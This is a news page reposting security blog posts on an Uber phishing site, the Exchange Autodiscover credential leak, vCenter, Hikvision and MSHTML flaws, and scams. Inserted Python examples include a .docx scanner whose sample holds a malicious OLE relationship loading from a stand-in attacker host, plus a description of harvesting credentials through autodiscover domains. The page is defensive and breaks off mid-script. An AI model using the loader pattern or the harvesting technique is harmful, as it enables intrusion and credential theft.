IT News

Explore the MakoLogics IT News for valuable insights and thought leadership on industry best practices in managed IT services and enterprise security updates.

Beware! Uber scam lures victims with alert from a real Uber number

This morning Malwarebytes Labs received a scam masquerading as a security alert from Uber. The alert was pretty convincing and used the kind of language we’re used to seeing in genuine security emails and SMS messages. It read:

Your Uber account was recently logged into from iPhone in London. If this wasn't you, reset your password here: [URL redacted]

But what really caught our attention was that the fake security alert came from the phone number that the real Uber uses to send us messages. Of course that doesn’t mean that Uber has been compromised, or that somebody at Uber is running the scam—caller ID spoofing is easy and scammers use it to make their messages appear to come from Uber.

Because it spoofed the real Uber number, the scam security message appeared alongside all the real security messages we get from Uber.

The fake alert appears alongside real security messages from Uber.

We noticed that the message was a scam because the domain name (the part of the address that ends in .com) just didn’t look right. Although it contained the word “uber” it wasn’t the official Uber domain name, uber.com.

We looked it up and discovered the domain name had only been created today.

Creation Date: 2021-09-24T02:13:38Z

Because scam sites get shut down very quickly, scammers get through a lot of “burner” website names that live and die within days. Most companies’ domain names have been around a while, so a very recent creation date is a big red flag.

Another quick check revealed that this absolutely brand new website was hosted in Russia. There’s nothing wrong with hosting websites in Russia, but it isn’t where Uber keeps its websites.
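The three checks just described (is it the official domain, how old is the domain, where is it hosted) are easy to script. The following is an added example, not code from the Malwarebytes post: a small Python triage helper that compares a link’s host against the real registrable domain instead of looking for the word “uber” anywhere in the name, and parses a WHOIS “Creation Date:” line in the format shown above to flag domains that are only days old. The lookalike URL and the WHOIS text are constructed for the demonstration, and the 30-day threshold is an assumption.

```python
"""Scriptable triage for a suspicious password-reset link.

Added example, not code from the Malwarebytes post. The lookalike URL and
the WHOIS text below are constructed for the demonstration; the 30-day
"too new" threshold is an assumption.
"""
from datetime import datetime, timezone
from typing import List, Optional
from urllib.parse import urlsplit

OFFICIAL_DOMAIN = "uber.com"
MIN_AGE_DAYS = 30  # assumption: anything younger is treated as a burner

# Constructed sample: a lookalike host under the reserved .example TLD,
# and WHOIS output in the shape quoted in the article.
SAMPLE_URL = "https://account-uber.example/reset"
SAMPLE_WHOIS = (
    "Domain Name: ACCOUNT-UBER.EXAMPLE\n"
    "Creation Date: 2021-09-24T02:13:38Z\n"
)
SAMPLE_NOW = datetime(2021, 9, 24, 9, 0, tzinfo=timezone.utc)


def host_of(url: str) -> str:
    """Lower-cased hostname of a URL ('' if there is none)."""
    return (urlsplit(url).hostname or "").lower().rstrip(".")


def is_official_domain(url: str, official: str = OFFICIAL_DOMAIN) -> bool:
    """True only if the host IS the official domain or a subdomain of it.

    'uber' appearing somewhere in the name proves nothing; the comparison
    has to be against the whole registrable domain, anchored at the end.
    """
    host = host_of(url)
    official = official.lower()
    return host == official or host.endswith("." + official)


def parse_creation_date(whois_text: str) -> Optional[datetime]:
    """Extract the 'Creation Date:' value from WHOIS output (RFC 3339 form)."""
    for line in whois_text.splitlines():
        key, sep, value = line.partition(":")  # splits at the first colon only
        if sep and key.strip().lower() == "creation date":
            value = value.strip()
            if value.endswith("Z"):  # fromisoformat wants +00:00 on older Pythons
                value = value[:-1] + "+00:00"
            return datetime.fromisoformat(value)
    return None


def domain_age_days(whois_text: str, now: datetime) -> Optional[int]:
    """Age of the domain in whole days, or None if no creation date was found."""
    created = parse_creation_date(whois_text)
    return None if created is None else (now - created).days


def triage(url: str, whois_text: str, now: datetime,
           official: str = OFFICIAL_DOMAIN,
           min_age_days: int = MIN_AGE_DAYS) -> List[str]:
    """Red flags raised for a link; an empty list means nothing fired."""
    flags = []
    host = host_of(url)
    if not is_official_domain(url, official):
        brand = official.split(".")[0]
        kind = "lookalike containing the brand name" if brand in host else "unrelated domain"
        flags.append(f"host {host!r} is not {official} ({kind})")
    age = domain_age_days(whois_text, now)
    if age is None:
        flags.append("WHOIS output has no creation date")
    elif age < min_age_days:
        flags.append(f"domain was created {age} day(s) ago")
    return flags


if __name__ == "__main__":
    for flag in triage(SAMPLE_URL, SAMPLE_WHOIS, SAMPLE_NOW):
        print("RED FLAG:", flag)
```

Run against the constructed sample it reports two flags: the host is a lookalike, and the domain was created the same day. The suffix comparison is the important design choice: `uber.com.evil.example` and `notuber.com` both fail it, which a naive `"uber" in host` test would not catch.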

Confident that we were looking at a scam, we created some fake personal details, fired up a Tor browser and jumped into the rabbit hole.

The scam site

The scam site had borrowed enough Uber branding to look convincing, and like all good scam sites it had a valid security certificate and a padlock icon. A useful reminder that the padlock tells us our connection to the site is secure, but says nothing whatsoever about how secure or trustworthy a site is. Nothing.

Page one, pretty vacant

Page one asks us for our phone number. It looks good but under the hood the scammers have done as little work as possible:

  • We entered a temporary SMS number instead of our real number, but it also worked without one, because the scammers don’t actually care about capturing your phone number.
  • The “Or connect using a social account” link looks convincing but it’s fake. It isn’t broken, it’s just window dressing that was never designed to work.

The first page of the Uber scam site looks convincing, but it’s just a facade.

Page two, the story changes

The next page tells us that we’ve been locked out of our account and need to verify our identity.

We've detected suspicious activity on your Uber account and have temporarily locked it as a security precaution.

Over the next few steps we'll ask you to verify your identity to help secure your account, and let you log back in.

Remember that the initial SMS message just told us we just had to reset our password. The scammers are slowly changing the message here because what they really want is a credit card number.

The scammers change the story from resetting our password to verifying our identity

Page three, ID theft

On the next page the scam site asks for some personal details. This page could be here to steal our ID, or it could just be here to get us comfortable typing in our details, so we don’t think twice when we’re asked for our credit card details on the next page.

Whatever it’s for, they didn’t get anything useful from us. A “burner” site deserves nothing more than a burner ID.

The scam site asks for personal details.

Page four, billing details

Page four of the scam site asked us for both our credit card details and our bank account details. This, presumably, is the whole point of the scam.

At this stage it’s worth recalling that the scammers originally told us we needed to change our password, and later changed the story, telling us we needed to verify our identity. Now we are being asked for “billing details” and there is no mention of verifying our identity.

The scammers are presumably hoping that we will simply respond to the cues on the page—the familiar title “Billing details” and the usual set of credit card input fields—and won’t think about how we got here.

This page is the reddest of red flags.

It goes without saying that this isn’t how you verify your identity. And remember that the scammers contacted us pretending to be Uber and we “fell” for their scam because we are Uber users. Which means Uber already has our credit card details and there is no reason for us to tell them again.

Plausible-looking credit card numbers are easy to generate, so we fed the scammers some fake details and continued on.

The site asks for credit card details and bank account details.

Page five, success?

The last page of the site tells us we have successfully verified ourselves. The purpose of this page is to reassure us that everything is OK, and that nothing is out of the ordinary, before sending us to the real Uber website.

Leaving the scam site

Final page, the real Uber website

The scam site’s last act is to redirect our browser to the real Uber home page. The longer we hang about on the scam site the more likely we are to notice things that aren’t right, so as soon as they have our details the scammers send us on our way. Sending us to the real Uber site presumably also allows us to reassure ourselves that our “locked account” now works.

The real Uber website

How not to spot a phish

This scam is a great example of things that can help you spot a scam, and the things that you might hope would help you, but actually work against you.

Things that didn’t help

  • Caller ID. Caller ID spoofing is easy and you can’t rely on your phone to tell you who a call or message is from.
  • The padlock icon. Anyone can give their website a padlock icon, which is a good thing—it indicates you have a “secure line” to that website—but it says nothing about the website itself, and never did.

Things that did help

  • The site did not use Uber’s official domain name. The domain name looked plausible, but it was wrong.
  • The story changed. Step-by-step the scammers had to change their story from “reset your password” to “enter your billing details” to get what they wanted.
  • The scammers asked for things Uber would already know. Our familiarity with Uber is what made the scam believable, but it also gave us an opportunity to spot it.
  • Scammers always ask for something valuable, urgently. Although scams come in many different forms, they normally boil down to somebody asking for valuable information urgently. If somebody asks you for valuable information, urgently, and out of the blue, treat it as a red flag and take your time.

Because the scam happened in the UK, we reported it to the UK’s National Cyber Security Centre (NCSC). We also added it to Malwarebytes Browser Guard, and reported it to Google’s Safe Browsing.

Although this site was quickly closed down, it’s likely there are others, and it will be easy for the scammers to spin up many more identical replacement sites on new domain names, so please be careful!

The post Beware! Uber scam lures victims with alert from a real Uber number appeared first on Malwarebytes Labs.

How to clear your cache

The term “cache” refers to a storage container. If you’re familiar with the outdoor recreational activity geocaching, you may be familiar with the term outside of computing. But in website and computer terms, a cache is temporary storage that is used to speed up future requests and load things more quickly for the user.

Caches are used in several different ways in computing.

Your computer’s processor has its own cache called the CPU cache that links the main memory and the processor. There’s a disk cache, too, that links the CPU and storage. Computers also reserve a portion of their RAM to heighten processing speed. And then there’s the browser cache.

What is a browser cache?

In computing terms, and specifically for web browsers, websites use a browser cache to store some elements for faster future loading.

When you try to visit a website, by typing in the URL, or clicking through from Google or another website, you make a request in the web browser. The website you asked for replies to your request by loading the website.

For websites that you visit often, some elements like images or fonts are stored in your browser’s cache. This way, the browser already has some parts of the website so it can load faster on your future visits.

Is it a good idea to clear your cache?

Your browser cache helps websites load faster and more efficiently. Clearing your cache regularly can be counterproductive—it will slow down websites that you visit often, because you have to load all elements just like it’s your very first visit to that site. But clearing your browser cache periodically can be helpful for performance and other reasons.

Why should I clear my browser cache?

Website owners typically update their websites regularly, and so cached website elements become outdated over time. A website that’s not working correctly because the files stored in your browser cache don’t match the files loading from the Internet may perform better after clearing your browser cache. That’s because your browser loads the latest version of the website rather than older cached elements. Think of it like a reset for the website.

Is it time to clear your cache? Here’s how to do so in major web browsers:

How to clear the cache in Google Chrome

  1. Start the Chrome browser
  2. Click the three vertical dots on the top right.
  3. Click More tools.
  4. Click Clear browsing data.
  5. Select a time range.
  6. Check all the boxes.
  7. Click Clear data to delete the Chrome cache.

How to clear the cache in Mozilla Firefox

  1. Start Mozilla Firefox.
  2. Click the three vertical lines on the top right.
  3. Click Settings.
  4. Select Privacy & Security.
  5. Under Cookies and Site Data, click Clear Data.
  6. Check the content you wish to clear.
  7. Click Clear to delete your Firefox cache.

How to clear the cache in Microsoft Edge

  1. Start Microsoft Edge.
  2. Click the three horizontal dots on the top right.
  3. Click Settings.
  4. Click Privacy, search, and services.
  5. Under Clear browsing data, click Choose what to clear.
  6. Tick all the boxes if you want to delete all the cache.
  7. Click Clear now to delete the Edge cache.

How to clear the cache in Internet Explorer

  1. Start Internet Explorer.
  2. Click the gears icon on the top right.
  3. Pick Internet options in the drop-down menu.
  4. Find Browsing history in General.
  5. Click Delete…
  6. Tick all the boxes.
  7. Click Delete to delete the cache in Internet Explorer

How to clear the cache on Safari

  1. Start Safari
  2. Select Preferences from the drop-down menu.
  3. Click the Advanced tab.
  4. In the menu bar pick Show Develop menu
  5. Select Develop from the drop-down menu and click Empty Cache to delete the Safari cache.

How to clear the cache on your iPhone or iPad

  1. Go to Settings
  2. Tap Safari.
  3. Scroll down until you see Clear History and Website Data.
  4. Tap Clear History and Website Data.
  5. Tap Clear History and Data to clear your browsing history, cookies, location data, etc., and delete the cache on iPhone.

The post How to clear your cache appeared first on Malwarebytes Labs.

Microsoft Exchange Autodiscover flaw reveals users’ passwords

Researchers have been able to get hold of 372,072 Windows domain credentials, including 96,671 unique credentials, in slightly over 4 months by setting up a Microsoft Exchange server and using Autodiscover domains.

The credentials that are being leaked are valid Windows domain credentials used to authenticate to Microsoft Exchange servers.

What is Autodiscover?

From Microsoft’s site we learn that “the Autodiscover service minimizes user configuration and deployment steps by providing clients access to Exchange features. For Exchange Web Services (EWS) clients, Autodiscover is typically used to find the EWS endpoint URL. However, Autodiscover can also provide information to configure clients that use other protocols. Autodiscover works for client applications that are inside or outside firewalls and in resource forest and multiple forest scenarios”.

This boils down to a feature of Exchange email servers that allows email clients to automatically discover email servers, send credentials, and then receive the proper configuration. It is designed to make the user’s life easier, while forgetting that such designs need to be done with security in mind, because cybercriminals love such features and use them for their own purposes.

How can it be abused?

The protocol’s goal is to make an end-user be able to completely configure their Outlook client solely by providing their username and password and leave the rest of the configuration to Microsoft Exchange’s Autodiscover protocol.

To accomplish this the Autodiscover protocol looks for a valid Autodiscover URL in these formats, where example.com is replaced by the domain name (the part after the @) in the user’s email address:

https://autodiscover.example.com/Autodiscover/Autodiscover.xml
http://autodiscover.example.com/Autodiscover/Autodiscover.xml
https://example.com/Autodiscover/Autodiscover.xml
http://example.com/Autodiscover/Autodiscover.xml

This means that, to start with, Autodiscover is looking for a URL at a domain or subdomain owned by the organization the user belongs to, so mistakes are contained and unlikely to cause problems. But if none of the above returns a valid response, the process carries on where it should probably have given up.

If those attempts fail, the next attempt to build an Autodiscover URL drops the example.com part that confines lookups to the user’s organization and looks here:

http://autodiscover.com/Autodiscover/Autodiscover.xml

This gives whoever owns the domain autodiscover.com a huge opportunity.

And the same is true for other Autodiscover top-level domains (TLDs) too, such as autodiscover.es, which will receive requests from all unresponsive .es domains.

To complete the mess, there is no login procedure required on the server side. The unsuspecting user trying to set up their Exchange account is just sending their credentials to an unknown server. There is also no attempt on the client’s side to check if the resource is available, or even exists on the server, before sending an authenticated request.

How bad is it?

It is important to understand that since Microsoft Exchange is part of the Microsoft domain suite of solutions, the credentials that are necessary to login to an Exchange-based inbox are in most cases the same as their domain credentials. The possible consequences of a domain credential leak at such a scale are enormous, and can put entire organizations in danger. Especially in the light of the ongoing ransomware attacks that are daily news. What easier way could an attacker ask for than to gain entry into an organization by using legitimate and valid credentials?

A quick search on my part showed that in most of the big TLDs the autodiscover domains have already been picked up.

Autodiscover domains

Some of the most dangerous ones have been registered by the researchers to do their testing.

Detection and mitigation

Organizations can protect themselves by establishing their own Autodiscover domains, and blocking Autodiscover.TLD domains at the firewall or in their local DNS. Users can block Autodiscover.TLD domains in their hosts file.

Software vendors and developers who are implementing the Autodiscover protocol in their products should make sure that they are not letting it “fail upwards”, meaning that domains such as autodiscover.TLD should never be constructed by the “back-off” algorithm.
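To make the “fail upwards” step and its fix concrete, here is an added Python example; it is not Microsoft’s, Outlook’s or the researchers’ code. It models only the URL shapes quoted in the article (the real client has other lookup steps this does not cover) and treats the faulty step as one extra candidate, `http://autodiscover.<TLD>/Autodiscover/Autodiscover.xml`, tried after the four per-organization URLs. The contained version applies the guard the paragraph above calls for (never construct a host outside the user’s own domain), and the last two helpers produce the `autodiscover.TLD` sinkhole entries mentioned under mitigation.

```python
"""Autodiscover URL construction: the 'fail upwards' back-off described in
the article beside a contained version, plus a sinkhole-list helper.

Added example; not Microsoft's, Outlook's or the researchers' code. It
models only the URL shapes quoted in the article and treats the faulty
step as one extra candidate (http://autodiscover.<TLD>/...) tried after
the four per-organization URLs.
"""
from typing import List

AUTODISCOVER_PATH = "/Autodiscover/Autodiscover.xml"


def email_domain(address: str) -> str:
    """Domain part of an e-mail address (the part after the @), lower-cased."""
    local, sep, domain = address.rpartition("@")
    if not sep or not local or not domain:
        raise ValueError(f"not an e-mail address: {address!r}")
    return domain.lower().strip(".")


def same_organization(host: str, domain: str) -> bool:
    """Guard: is this host the user's domain or a subdomain of it?"""
    host, domain = host.lower(), domain.lower()
    return host == domain or host.endswith("." + domain)


def per_organization_candidates(domain: str) -> List[str]:
    """The four URLs listed in the article, all inside the user's own domain."""
    return [f"{scheme}://{host}{AUTODISCOVER_PATH}"
            for host in (f"autodiscover.{domain}", domain)
            for scheme in ("https", "http")]


def failing_upwards_candidates(domain: str) -> List[str]:
    """The back-off as described: after the per-domain URLs it drops the
    organization and asks autodiscover.<TLD>, a host owned by whoever
    registered that name."""
    tld = domain.rsplit(".", 1)[-1]
    return per_organization_candidates(domain) + [
        f"http://autodiscover.{tld}{AUTODISCOVER_PATH}"]


def contained_candidates(domain: str) -> List[str]:
    """Hardened: any candidate whose host leaves the user's domain is dropped,
    so the process gives up instead of failing upwards."""
    kept = []
    for url in failing_upwards_candidates(domain):
        host = url.split("://", 1)[1].split("/", 1)[0]
        if same_organization(host, domain):
            kept.append(url)
    return kept


def is_autodiscover_tld_host(hostname: str) -> bool:
    """True for 'autodiscover.<tld>' exactly (two labels): the hosts an
    organization would sinkhole in DNS or block at the firewall. Multi-label
    public suffixes such as co.uk are not handled by this simplification."""
    labels = hostname.lower().strip(".").split(".")
    return len(labels) == 2 and labels[0] == "autodiscover"


def hosts_file_lines(tlds: List[str]) -> List[str]:
    """hosts-file entries that sinkhole autodiscover.<tld> for the given TLDs."""
    return [f"0.0.0.0 autodiscover.{tld.lower().strip('.')}" for tld in tlds]


if __name__ == "__main__":
    d = email_domain("someone@example.es")
    print("faulty last candidate:", failing_upwards_candidates(d)[-1])
    print("contained candidates :", contained_candidates(d))
    print("\n".join(hosts_file_lines(["com", "es"])))
```

For `someone@example.es` the faulty list ends with `http://autodiscover.es/Autodiscover/Autodiscover.xml`, exactly the host the article says collects requests from every unresponsive `.es` domain; the contained list is the four per-organization URLs and nothing else. The hosts-file lines are the user-side mitigation from the paragraph above; the same names can go into a DNS sinkhole or firewall rule.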

When deploying or configuring Exchange server setups, organizations should also make sure that support for basic authentication is disabled. Using HTTP basic authentication sends credentials in clear text, making them easy to intercept.

When a user is being redirected to an Autodiscover.TLD server trying to make use of the leak, a security alert might pop up if it doesn’t have a security certificate, or if it has one that is self-signed. This could easily be avoided by the attacker if they deploy a valid TLS certificate though.

Microsoft was not informed of the problem before the credential harvesting was set in motion and the results were already published, so they are still investigating and promised to take appropriate steps to protect customers.

Stay safe, everyone!

The post Microsoft Exchange Autodiscover flaw reveals users’ passwords appeared first on Malwarebytes Labs.

Italian mafia cybercrime sting leads to 100+ arrests

The Spanish National Police (Policía Nacional) has successfully dismantled an organized crime ring of hundreds of members in a sting operation supported by Europol, the Italian National Police (Polizia di Stato), and Eurojust. This is the end result of a year-long investigation.

The organized crime ring, which operated in Spain’s Canary Islands, is said to have ties with the Italian Mafia who are “involved in online fraud, money laundering, drug trafficking and property crime.” The official site of the Spanish National Police named the Italian mafia clans as the Casamonica, Camorra Napolitana, Nuvoletta, and Sacra Corona Unita.

In just a year, they were able to steal a total of 11.72M USD (10M EUR) from hundreds of victims of phishing attacks and other fraudulent activities such as SIM swapping (also known as SIMjacking), business email compromise (BEC), and money muling. The Spanish National Police page also mentioned other crimes, such as “kidnapping, falsification of documents, injuries, threats, coercion, robbery with violence, Social Security fraud and illegal possession of weapons.”

Europol has summarized the overall results of this sting:

  • 106 arrests, mostly in Spain and some in Italy
  • 16 house searches
  • 118 bank accounts frozen
  • Seizures include many electronic devices, 224 credit cards, SIM cards and point-of-sale terminals, a marijuana plantation and equipment for its cultivation and distribution.

Europol described the ring as “very well organized”, saying it included computer experts who created the phishing domains and spearheaded cyber fraud, money mule recruiters and organizers, and money launderers, some of whom are said to be cryptocurrency experts.

Most of the suspects are Italian nationals, who largely victimized Italian citizens into sending large sums of money to bank accounts the criminal network controls. From there, the money was then moved by money mules and invested into shell companies. Countries affected by their fraudulent schemes include Spain, Germany, Ireland, Italy, Lithuania, and the United Kingdom.

“Cyber mafia” is not an unknown concept in the cybersecurity world.

In 2012, Belgian police were called in to investigate a case involving computers of the Swiss Shipping Company, MSC. They found “tiny computers known as pwnies (pronounced ponies) packed in memory sticks and sitting on several of the workstations”, which caused dramatic and consistent computer slowdown. They realized that these pwnies were being used to steal important information needed “to track specific containers and gain access to restricted areas of the port.” Once these containers were ready for collection, the mafia swooped in, sending in their trucks to drive the containers away. Journalist Misha Glenny called it “the most dramatic example that law enforcement had ever seen of the fusion of two types of crime: a traditional mafia operation and criminal hackers.”

In a more recent example, Italy’s Anti-mafia Directorate (DIA) published a report [PDF, in Italian only] in August about Italian Mafia groups turning to the dark web to hide their criminal activities, and masking the transfer of ill-gotten money using cryptocurrencies like Bitcoin and Monero.

The post Italian mafia cybercrime sting leads to 100+ arrests appeared first on Malwarebytes Labs.

No, Colonel Gaddafi’s daughter isn’t emailing to give you untold riches

It’s not every day you receive a big money offer from someone claiming to sit in political asylum, but here we are. The following missive landed in our spam traps at the weekend.

The mail claims to be from the daughter of no less than the late Colonel Gaddafi. Ayesha Gaddafi promises you untold riches if you help her find a home for $27.5 million.

The bogus mail, titled “Re: Please i need your help”, reads as follows:

Re: Please i need your help

I am sending my greetings to you from the Sultanate of Oman, In the capital city of Muscat.

May i use this medium to open a mutual communication with you, and seeking your acceptance towards investing in your country under your management as my partner, My name is Aisha Gaddafi and presently living in Oman, i am a Widow and single Mother with three Children, the only biological Daughter of late Libyan President (Late Colonel Muammar Gaddafi) and presently i am under political asylum protection by the Omani Government.

I have funds worth “Twenty Seven Million Five Hundred Thousand United State Dollars” -$27.500.000.00 US Dollars which i want to entrust on you for investment project in your country.If you are willing to handle this project on my behalf, kindly reply urgent to enable me provide you more details to start the transfer process.

I shall appreciate your urgent response through my email address below: aishaggaddafi36[removed]

Thanks

Yours Truly Aisha

The background to this tall tale

Ayesha fled Libya shortly after the Battle of Tripoli back in 2011. She eventually moved from Algeria to Oman, where she claims political asylum to this day. Note that the mail claims she’s a “single mother with three children”. The scammers can’t even get this right; Aisha has had four children, but two of them were killed during the fighting in 2011.

This is likely something they’re hoping most recipients of the mail won’t bother digging into too deeply. The prize, after all, is a remarkably large one.

What’s the impact of the scam here?

Should you respond, there’s a very good chance one or all of the below will take place.

  • You’ll lose an incredible amount of money. They just want your bank details. You’ll either find yourself sending them sums of cash for [inexplicable reason goes here], or you’ll be sent some money.
  • Being sent some money means you’re now a money mule. This is illegal, and you’re helping criminals to move around ill-gotten gains. You know how in cartoons, a character is left holding the bag in front of the police while the criminal is free to slink away? This will be you.
  • Personal details stolen. Many of these scams involve you sending scanned copies of passports or other forms of ID. This now leaves you open to identity theft, and other related shenanigans.

The following will not happen:

  • At no point will you be conversing with the real Ayesha Gaddafi
  • You will not get rich

Should this wind up in your mailbox: Report, delete, and block the sender. There’s no scenario here which plays out any other way than you losing your time, identity, and money to a fraudster.

For “Ayesha”, the search for an overseas investment opportunity continues.

The post No, Colonel Gaddafi’s daughter isn’t emailing to give you untold riches appeared first on Malwarebytes Labs.

Patch vCenter Server “right now”, VMWare expects CVE-2021-22005 exploitation within minutes of disclosure

VMware is urging users of vCenter server to patch no fewer than 19 problems affecting its products.

These updates fix a variety of security vulnerabilities, but one of them is particularly nasty. That would be CVE-2021-22005, a critical file upload vulnerability with a CVSS score of 9.8 out of 10.

It’s so bad the company is advising users to sort it out “right now”:

These updates fix a critical security vulnerability, and your response needs to be considered at once. Organizations that practice change management using the ITIL definitions of change types would consider this an “emergency change.”

CVE-2021-22005

vCenter Server is a way to manage large infrastructure. If you have lots of hosts and virtual machines, this is a very good way to manage every aspect of your setup. With this in mind, if someone manages to compromise your vCenter, it probably won’t end well.

And that’s exactly what CVE-2021-22005 does. It’s a file upload vulnerability and anyone with access to vCenter Server over a network can exploit it. The configuration settings of vCenter Server don’t make any difference. If criminals get network access they can upload a specially made file and use it to execute code on the vCenter Server.

As VMware points out, bad actors are often already in your network. They wait patiently to strike. It’s likely they’ll exfiltrate data slowly and nobody will ever know they’re there. Being able to snag a win like this for themselves could increase the threat from ransomware and other malicious activity.

What should I do?

Patching immediately is definitely the go-to advice. VMware acknowledges that an emergency patch may fall outside how you usually do things, but it really does impress upon readers that patching needs to be done as soon as possible. It is, perhaps, unusual (and refreshing) to see an organisation stress this fact so plainly, so kudos for being so forthright.

Is my vCenter Server setup affected by this?

It depends. Some versions, such as vCenter Server 6.5, are not affected. Others are. You should refer to the dedicated rundown on this issue and take appropriate action as soon as you possibly can. We’ll leave the last word to VMware with regard to when you should be patching:

Immediately, the ramifications of this vulnerability are serious and it is a matter of time – likely minutes after the disclosure – before working exploits are publicly available.

With the threat of ransomware looming nowadays the safest stance is to assume that an attacker may already have control of a desktop and a user account through the use of techniques like phishing or spearphishing, and act accordingly. This means the attacker may already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence.

This seems like very good advice.

The post Patch vCenter Server “right now”, VMWare expects CVE-2021-22005 exploitation within minutes of disclosure appeared first on Malwarebytes Labs.

Patch now! Insecure Hikvision security cameras can be taken over remotely

In a detailed post on GitHub, security researcher Watchful_IP describes how he found that the majority of the recent camera product ranges of Hikvision cameras are susceptible to a critical, unauthenticated, remote code execution (RCE) vulnerability, even with the latest firmware.

Hikvision

Hangzhou Hikvision Digital Technology Co., Ltd. engages in the development, production, and sale of security products. Its business activities include the provision of services for hard disk recorders, video codes, video servers, surveillance cameras, monitoring of ball machine, road mounts and other products, as well as security services. The company was founded on November 30, 2001 and is headquartered in Hangzhou, China.

According to global market data provider IHS Markit, Hikvision has 38% of the global market share, and it has been the market leader since 2011. Hikvision is also known for its research on technologies such as visual recognition, cloud computing, and their adoption in security scenarios.

The vulnerability

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The vulnerability found by Watchful_IP is listed under CVE-2021-36260 and could allow an unauthenticated attacker to gain full access to the device and possibly perform lateral movement into internal networks.

The critical bug has received 9.8 out of 10 on the CVSS scale of severity, clearly demonstrated by the fact it enables the attacker to gain even more access than the owner of the device has, since the owner will be restricted to a limited protected shell (psh) which filters input to a predefined set of limited, mostly informational commands.

According to the researcher, the vulnerability has existed at least since 2016. All an attacker needs is access to the http(s) server port (typically 80/443). No username or password is needed, nor are any actions needed from the camera owner. The attack will not be detectable by any logging on the camera itself. A threat actor can exploit the vulnerability to launch a command injection attack by sending some messages with specially crafted commands.

Affected products

Users can find a list of affected products in the security notification from Hikvision. Among them are IP cameras and PTZ cameras. PTZ is short for Pan/Tilt/Zoom and the name is used for cameras that can be remotely controlled and pointed. These cameras can be, and often are, used in surveillance mode, where they cover an area by moving between preset points; the footage is often recorded so it can be reviewed at a later time.

Users of other brands should also be advised that there are a huge number of OEM resellers offering Hikvision cameras under their own model numbers.

Responsible disclosure

The researcher has not disclosed any specifics about the attack to protect potential victims. In his post he describes how he worked with Hikvision since the discovery made on Sunday June 20, 2021. He was extremely pleased that they took him seriously and involved him in taking care of the problem.

On August 17, Watchful_IP received the patched IPC_G3 (V5.5.800 build 210628) and IPC H5 (V5.5.800 build 210628) firmware from HSRC for testing.

“Decrypted and reversed the code in addition to live testing on my own equipment and confirmed to HSRC that the patched firmware resolves the vulnerability.

Was further pleased to note this problem was fixed in the way I recommended.”

We are glad that researchers like this check the security of the products we use and do responsible disclosure when they find problems, so manufacturers can resolve matters before some cybercriminal can start using our security equipment against us.

Mitigation

A word of caution is needed here, since not all the software portals have been provided with the latest firmware that is patched against this attack. To be sure to get a patched version, Hikvision recommends downloading the latest firmware for your device from the global firmware portal. The researcher however notes that at the time of writing updated firmware seems to be properly deployed on the Hikvision China region firmware portal for Chinese region devices, but only partially on the global site. If you are in doubt there is a list of the vulnerable firmware versions in the researcher’s post.

In general it is a good idea not to make your cameras accessible from the internet, and if you do, put them behind a VPN.

The post Patch now! Insecure Hikvision security cameras can be taken over remotely appeared first on Malwarebytes Labs.

MSHTML attack targets Russian state rocket centre and interior ministry

Malwarebytes has reason to believe that the MSHTML vulnerability listed under CVE-2021-40444 is being used to target Russian entities. The Malwarebytes Intelligence team has intercepted email attachments that are specifically targeting Russian organizations.

The first template we found is designed to look like an internal communication within JSC GREC Makeyev. The Joint Stock Company State Rocket Center named after Academician V.P. Makeyev is a strategic holding of the country’s defense and industrial complex for both the rocket and space industry. It is also the lead developer of liquid and solid-fuel strategic missile systems with ballistic missiles, making it one of Russia’s largest research and development centers for developing rocket and space technology.

The email claims to come from the Human Resources (HR) department of the organization.

A phishing email targeted at the Makeyev State Rocket Center, posing as its own HR department

It says that HR is performing a check of the personal data provided by employees. The email asks employees to please fill out the form and send it to HR, or reply to the mail. When the receiver wants to fill out the form they will have to enable editing, and that action is enough to trigger the exploit.

The attack depends on MSHTML loading a specially crafted ActiveX control when the target opens a malicious Office document. The loaded ActiveX control can then run arbitrary code to infect the system with more malware.
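As an added example (not Malwarebytes code), the following Python script shows one defender-side check for the document shape described above: an Office Open XML document whose OLE-object relationship, instead of pointing at an embedded object inside the package, points at an external `mhtml:` target, which is the loader pattern reported for CVE-2021-40444 documents. The script parses the `.rels` parts of a `.docx` and flags any external OLE relationship (legitimate embedded objects are internal), rating an `mhtml:` target higher. The two sample documents, including the `attacker.example` URL, are constructed inline so the script runs offline.

```python
"""Flag .docx files whose OLE-object relationship points at an external target.

Added example, not Malwarebytes code. The sample documents built below are
constructed; attacker.example is a placeholder host."""
import io
import sys
import zipfile
from xml.etree import ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")


def find_external_ole_relationships(docx_bytes):
    """Return (rels part, target, severity) for each OLE-object relationship
    with TargetMode="External". Embedded objects are internal, so any
    external one deserves a look; an mhtml: target is the CVE-2021-40444 shape."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                # A relationships part that will not parse is itself worth reporting.
                findings.append((name, "<unparseable rels part>", "medium"))
                continue
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") != OLE_REL_TYPE:
                    continue
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                severity = "high" if target.lower().startswith("mhtml:") else "medium"
                findings.append((name, target, severity))
    return findings


# Minimal constructed package parts; only the .rels content matters to the scanner.
CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '</Types>')
RELS_HEADER = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
               f'<Relationships xmlns="{REL_NS}">')
# Benign: the OLE object is embedded inside the package.
BENIGN_RELS = (RELS_HEADER +
               f'<Relationship Id="rId1" Type="{OLE_REL_TYPE}" Target="embeddings/oleObject1.bin"/>'
               '</Relationships>')
# Suspicious: the OLE object is fetched from an external mhtml: target (placeholder host).
SUSPICIOUS_RELS = (RELS_HEADER +
                   f'<Relationship Id="rId1" Type="{OLE_REL_TYPE}" '
                   'Target="mhtml:http://attacker.example/placeholder.html" TargetMode="External"/>'
                   '</Relationships>')


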